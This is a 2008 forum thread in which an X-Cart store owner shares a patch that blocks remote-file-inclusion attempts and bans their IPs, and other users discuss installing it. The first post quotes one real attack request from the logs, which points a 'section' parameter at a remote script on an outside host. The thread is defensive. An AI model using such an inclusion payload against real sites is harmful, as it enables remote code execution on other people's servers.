[PATCH] Blocking those pesky hackers

intel352 · #1 04-01-2008, 11:24 AM

My wife's X-Cart website has been showing a large number of Users Online for the past few weeks, but the purchases aren't nearly equaling the number of visitors.

I decided to check out the type of traffic that she's getting, and found that many are hackers/bots that are trying to exploit different areas of the website. One such exploit that I've seen 20 of in the past hour, is: /help.php?section=http://myweddingphotos.by.ru/image.php?

The url that the hackers are passing varies. Many are trying to see if they can execute a remote inclusion apparently, and since this is the most popular attempt on our store right now, I've written some code to block such attempts, and ban the user (bans use the Stop List module, if it's enabled).

As mentioned above, the Stop List module is used if detected to record bans, but if it's not enabled, that's fine, the patch will only block *immediate* hack attempts. When Stop List is enabled, that is when an IP ban will occur.

The attached zip file has a .patch file and a .sql file. You can apply both patches via the Patch/Upgrade section of the X-Cart Administration.

Additionally, this is for 4.1, I have not tested on any older versions of X-Cart.

NOTE: If you happen to block yourself from your own store, the blocked IPs are only blocked from the customer section, so you can still login to your admin section, go to the Stop List section, and delete your IP address

Once I enabled this mod, I noticed that our Users Online started being a bit more accurate, as this mod blocks the hack attempts before they get logged as a visitor.

This code only bans based on a "http://" value being passed in the query string. I'm not aware of X-Cart passing a full url to itself in any query string parameters, but you need to be responsible for your own store by testing this thoroughly.
No need to ban your users because you didn't test the patch out.

I would specifically recommend testing multi-language websites, as that redirect method might pass a complete url, but I don't believe it does.

Jerrad · #2 04-01-2008, 02:20 PM

Thanks for this mod, Jon!
I really would like to implement it in our 4.0.12 store, cause lately we're also seeing really a lot of the same url's.

Can there any harm be done by this patch in a older version of X-cart?

intel352 · #3 04-01-2008, 02:39 PM

You'll likely have to manually apply. I haven't checked it or tested it on 4.0 at all. If anything, the code that doesn't pertain to Stop_List module should work completely fine. I dunno if Stop_List is available in 4.0, if it is, you'll need to make sure the same functions exist (for the IP ban functionality)

intel352 · #4 04-01-2008, 07:37 PM

We've had 31 bans, just today (I didn't enable the hack until afternoon... lol)

Jerrad · #5 04-02-2008, 04:55 AM

Version 4.0.x has a stop_list, but applying patches manually is not one of my strongest skills...

mltriebe · #6 04-02-2008, 05:30 PM

Quote:

Originally Posted by intel352

We've had 31 bans, just today (I didn't enable the hack until afternoon... lol)

I just installed this and was wondering where you found this information. I will let you know how it works when I get some results because I have had a "BUNCH" of these hackers lately.

Mike

intel352 · #7 04-02-2008, 06:58 PM

if you have Stop List enabled, you'll see the bans in there, with the reason "Malicious hacker activity"

Funinc · #8 04-02-2008, 08:29 PM

Jon,
Can you please contact me.

Thank You,
Timm

mltriebe · #9 04-05-2008, 07:57 AM

Seems to be working well I have not seen a http:// address in the users online section since installing the patch. That being said I have enabled the Stop List and there are no IP's there either, must be a setting or something.

Thanks, Mike

intel352 · #10 04-08-2008, 08:08 AM

Hey Mike, as long as the Stop List module is enabled, should add bans there. might want to ensure there are no errors being tossed by your error log